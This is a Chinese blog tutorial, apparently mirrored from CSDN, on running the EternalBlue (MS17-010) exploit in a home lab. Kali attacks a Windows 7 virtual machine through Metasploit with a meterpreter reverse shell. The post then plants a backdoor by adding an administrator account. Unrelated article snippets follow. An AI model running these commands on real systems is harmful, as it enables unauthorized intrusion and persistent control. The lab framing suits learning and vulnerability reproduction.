kali与永恒之蓝

article/2025/8/21 10:13:41

kali永恒之蓝攻击

  • 写在前面
  • 一、永恒之蓝是何方神圣?
  • 二、神马是SMB协议?
  • 三、MSF
  • 四、攻击步骤
    • 1、攻击主机与靶机配置
    • 2、攻击步骤
  • 五、种植后门

写在前面

  这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,纯属兴趣爱好,本人非网络安全专业。写这个呢是为了记录一下去年我第一次在虚拟机上成功实现了永恒之蓝攻击,同时给一个“小朋友”做参考。目前,永恒之蓝漏洞已经销声匿迹了,所以大可不必担心。


一、永恒之蓝是何方神圣?

  永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。不过它只存在了一段时间就被修复了。

二、神马是SMB协议?

  SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API)。另外,它是一个开放性的协议,允许了协议扩展——使得它变得更大而且复杂;大约有65个最上层的作业,而每个作业都超过120个函数,甚至Windows NT也没有全部支持到。

三、MSF

  接下来的攻击演示中我们会用到msf,那么啥是msf呢?msf是目前最流行,最强大,最具扩展性的渗透测试平台软件,基于metasploit进行渗透测试和漏洞分析的流程和方法,框架集成了渗透测试标准(PETS)思想,一定程度上统一了渗透测试和漏洞研究的工作环境,可以比较容易新的攻击代码将加入框架,几乎每周都会进行开发活跃版本更新,使用postgresql数据库存储数据。想更详细的了解可以去看看这位大佬的博客:Hydraxx。

四、攻击步骤

1、攻击主机与靶机配置

  ①:使用kali作为攻击主机,Windows7旗舰版作为靶机。
  ②:查看kali的IP地址:在终端中输入ifconfig
在这里插入图片描述
可以看到kali的IP地址为192.168.42.129
  ③:查看Windows7旗舰版的IP地址:CMD中输入ipconfig
在这里插入图片描述
可以看到Windows7旗舰版的IP地址为192.168.42.130

2、攻击步骤

  ①、测试两台主机的连通性:关闭靶机的防火墙,在kali的终端中使用ping命令去ping Windows7旗舰版靶机的IP地址。命令:
ping 192.168.42.130
在这里插入图片描述
可以看见两台主机连通性良好
  ②:查看kali主机数据库是否开启:在终端中输入 service postgresql status
在这里插入图片描述
由上图可以看出:Active:inactive(dead)说明数据库此时是关闭的。
  ③:打开kali主机的数据库,命令:service postgresql start
  ④:再次查看kali主机的数据库,命令:service postgresql status
在这里插入图片描述
从图中可以看到:Active:inactive(exited)说明此时数据库已经打开

注:此后的命令皆需要root权限,终端输入su,输入密码即可进入root。
在这里插入图片描述
  附root密码修改方法:
在这里插入图片描述
  ⑤:初始化msfconsole数据库,配置数据库,命令:msfdb init
在这里插入图片描述
  此时就已经可以扫描永恒之蓝漏洞了,永恒之蓝用的是ms17_010漏洞,因此我们需要在kali中寻找ms17_010漏洞,并借此对Windows7靶机进行攻击,获取其管理员权限。
  ⑥:启动msf,命令:msfconsole
在这里插入图片描述
  这样就成功进入msf了,界面为随机图案。
  ⑦:然后查看数据库连接情况,命令:db_status
在这里插入图片描述
  注:上面的 “msf6 >” 说明进入了msf中。
  ⑧:搜索ms17_010,命令:search ms17_010
在这里插入图片描述  接下来我们将会用到上图中标记的命令
  扫描命令:use auxiliary/scanner/smb/smb_ms17_010
  攻击命令:use exploit/windows/smb/ms17_010_eternalblue
  ⑨:使用ms17_010模块进行漏洞扫描,命令:use auxiliary/scanner/smb/smb_ms17_010
在这里插入图片描述

  接下来输入options获取具体命令
在这里插入图片描述
  在此,只关注两个命令:RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描。
  ⑩:设置扫描的主机,靶机IP地址是192.168.42.130,因此设置扫描主机为192.168.42.130/24:set rhosts 192.168.42.130/24;然后设置扫描线程为20:set threads 20。
在这里插入图片描述
  最后输入run执行扫描
在这里插入图片描述
  由上图可以看出,扫描出来存在ms17_010漏洞的主机,也恰好是我的靶机。
  ⑪:
  初始攻击准备:use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述
  设置攻击目标:set rhost 192.168.42.130 (靶机)
  设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
  设置监听主机:set lhost 192.168.42.129 (kali)
在这里插入图片描述
  进行攻击:exploit
在这里插入图片描述
  出现WIN表示攻击成功
  注:如果多次攻击失败可尝试关闭主机(非虚拟机)的安全软件,防止被拦截,本人亲历。

五、种植后门

  ①:显示远程主机系统信息,命令:sysinfo
在这里插入图片描述
  ②:查看用户身份,命令:getuid
在这里插入图片描述
  ③:获取远程主机当前屏幕内容,命令:screenshot
在这里插入图片描述
  查看截图
在这里插入图片描述
  ④:进入shell,命令:shell
在这里插入图片描述
  出现上图即成功
  在shell控制台下使用如下命令:
  net user nizi 123456 /add  在Windows7上创建一个 nizi 的用户
在这里插入图片描述
  net localgroup adminstrators nizi /add  将nizi加入到Windows7的本地管理员组中,获得更大权限。
在这里插入图片描述
  net user  查看本地用户
在这里插入图片描述
  net localgroup administrators  查看本地管理员
在这里插入图片描述
  到这里,我们的攻击基本就结束了。关于meterpreter还有很多好玩的命令,详情可以在meterpreter下输入help命令获取,也可以移步另一位大佬的博客博客园:渗透测试中心。有疑问可以在评论区留言,下次见。


http://chatgpt.dhexx.cn/article/paH2WJ7V.shtml

相关文章

利用虚拟机复现漏洞 “永恒之蓝”

利用虚拟机复现漏洞“永恒之蓝” 攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程。 —— —— “ 永恒之蓝 ”简介 利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。于 2017 年在全球的范围内大面积爆发&#…

永恒之蓝简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改…

永恒之蓝-永恒之蓝漏洞(linux)

扫描存活主机 fping -a -g 192.168.52.1 192.168.56.254 ,因为kali是192.168.52.134,所以win2003是192.168.52.133 像192.168.52.2或者192.168.52.1这种不用管,一般是网关 开启msfconsole 搜索载荷,永恒之蓝的载荷是ms17_010 …

永恒之蓝漏洞复现

一,永恒之蓝 一、漏洞简介\n1、永恒之蓝介绍:\n永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局&#xff09…

永恒之蓝靶场

声明:本文仅限交流学习使用,请勿使用在任何非法商业活动,禁止用于非法用途。否则后果自负。如有侵权,请告知删除,谢谢! 在虚拟机上搭建win7环境(靶机) 攻击者kali2021版: 模拟永恒之蓝攻击过程的话,需要win7(靶机&…

永恒之蓝复现

目录 1.知识点: 2.前提准备 3.复现 1.知识点: (永恒之蓝适应低版本的电脑没有打ms17_010的补丁,现在win7以上的高版本已经不可以使用) 百度百科:永恒之蓝是指2017年4月14日晚,黑客团体Shadow…

永恒之蓝MS17-010漏洞复现

永恒之蓝漏洞复现 永恒之蓝漏洞简介准备工作命令功能查询靶机IP地址Nmap工具Msf框架相关搜索指令如下设置扫描对象扫描对方是否存在445端口开始攻击 设置攻击载荷设置攻击机及靶机攻击成功简单演示攻击结束 永恒之蓝漏洞简介 本次漏洞复现主要展示如何复现一次永恒之蓝漏洞攻击…

kali之永恒之蓝使用流程(操作全套步骤)

第一步需要kali系统的电脑和win7系统电脑的ip的地址在同一网段,互相之间可以ping通。 第二步关闭win7系统的防火墙。 往往失败就是这两部分的错误。 下边开始进入正题。 打开我们的kali系统,永恒之蓝控制版面开启指令 :msfconsole 小马图…

网络攻防——永恒之蓝

永恒之蓝 1.引言2.永恒之蓝定义3.SMB协议3.windows7版本说明4.攻击实例4.1攻击者和被攻击者展示4.2详细攻击过程4.3接下来尝试攻击一下windows10 5.参考文献 1.引言 让一个不爱学习的人整天蒙英语题,听张宇的视频实在是枯燥了点,于是决定看看网安&#x…

Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

目录 一、永恒之蓝概述 二、SMB协议 三、准备工作 四、漏洞复现 1、主机发现 2、端口扫描 3、利用模块 五、演示功能 1.获取cmd 2.捕获屏幕 3.上传文件 4.下载文件 5.远程登录 6.上传后门 7.免杀加壳 8.运行wannacry 9.清除日志 六、预防方案 1.打开防火墙 …

ajax提交form表单+跨域

有时候我们需要提交form表单&#xff0c;而又不想影响跳转页面&#xff0c;同时还不影响浏览器的 正常访问&#xff0c;这个时候就用到了ajax提交 首先&#xff0c;要引入js文件 <script type"text/javascript" src"${ctx}/newoa/js/jquery.form.js"…

使用原生javascript实现ajax提交form表单

使用原生javascript实现ajax提交form表单 ============================ 1 准备表单 首先我们需要编写一个html代码,这里我是采用nodejs里面的jade模板引擎来进行生成html代码的。 form(action="/ajaxTest2",method="post",enctype="text/…

Jquery Ajax提交form表单

ajax技术带给我们的是良好的用户体验,同时,使用jquery可以简化开发,提高工作效率。 献上一个简单的例子: 前台代码: index.aspx <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="index.aspx.cs" Inherits="AjaxDemo…

客户端调用服务端异常 —— 远程主机强迫关闭了一个现有的连接**(问题已解决)

客户端调用服务端异常 —— 远程主机强迫关闭了一个现有的连接&#xff08;问题已解决&#xff09; 今天跟大家分享一个日常出现的问题&#xff0c;今天前段调用的时候突然出现了远程主机强迫关闭了一个现有的连接的问题&#xff0c;先看问题图。 然后开始排查原因&#xff0…

频繁发送socket命令返回:[WinError 10054] 远程主机强迫关闭了一个现有的连接

第一类 错误原因&#xff1a;发送http请求太过频繁&#xff0c;引起远程主机的怀疑&#xff0c;被网站怀疑是恶意攻击行为。 解决方法&#xff1a; 在发送命令之后关闭连接&#xff0c;防止被认为恶意连接设置socket默认等待时间 设置读取信息的最大时间限制&#xff0c;如果…

关于Redis出现“java.io.IOException: 远程主机强迫关闭了一个现有的连接”的一次排查

背景 最近在使用springboot&#xff08;Windows下&#xff09;连接redis&#xff08;云服务器&#xff09;开发时发现一些问题&#xff1a;连接成功的情况下&#xff0c;在一段时间未交互数据后&#xff0c;再次通过连接与Redis传输数据回出现异常java.io.IOException: 远程主…

远程主机强迫关闭了一个现有的连接.

报错信息&#xff1a; 解决方法&#xff1a; 1.在命令行中查找占用“5037”端口的程序PID netstat -aon|findstr “5037”2. 打开任务管理器&#xff0c;找到相应的PID【15692】&#xff0c;将占用的端口关闭。 3. 发现adb.exe与Android Studio.exe共用同一个端口 adb.exe——…

xdm,请求帮助

这个怎么搞&#xff0c;xdm

Ubuntu 安装 XDM 2018 ( Xtreme Download Manager 2018 )

Xtreme下载管理器是一个功能强大的工具&#xff0c;可以将下载速度提高到500&#xff05;&#xff0c;保存来自YouTube&#xff0c;DailyMotion&#xff0c;Facebook&#xff0c;Vimeo&#xff0c;Google Video和1000多个其他网站的流媒体视频&#xff0c;恢复损坏/死亡下载&am…

Linux系统的下载神器XDM

自从装了双系统后一直在寻找一款媲美Windows系统中IDM的下载神器&#xff0c;XDM被我从云海中捞了出来&#xff01;堪比IDM的下载速度&#xff0c;亦是一款神器。 使用说明书 下载地址&#xff1a;https://sourceforge.net/projects/xdman/解压后&#xff0c;使用终端进入该…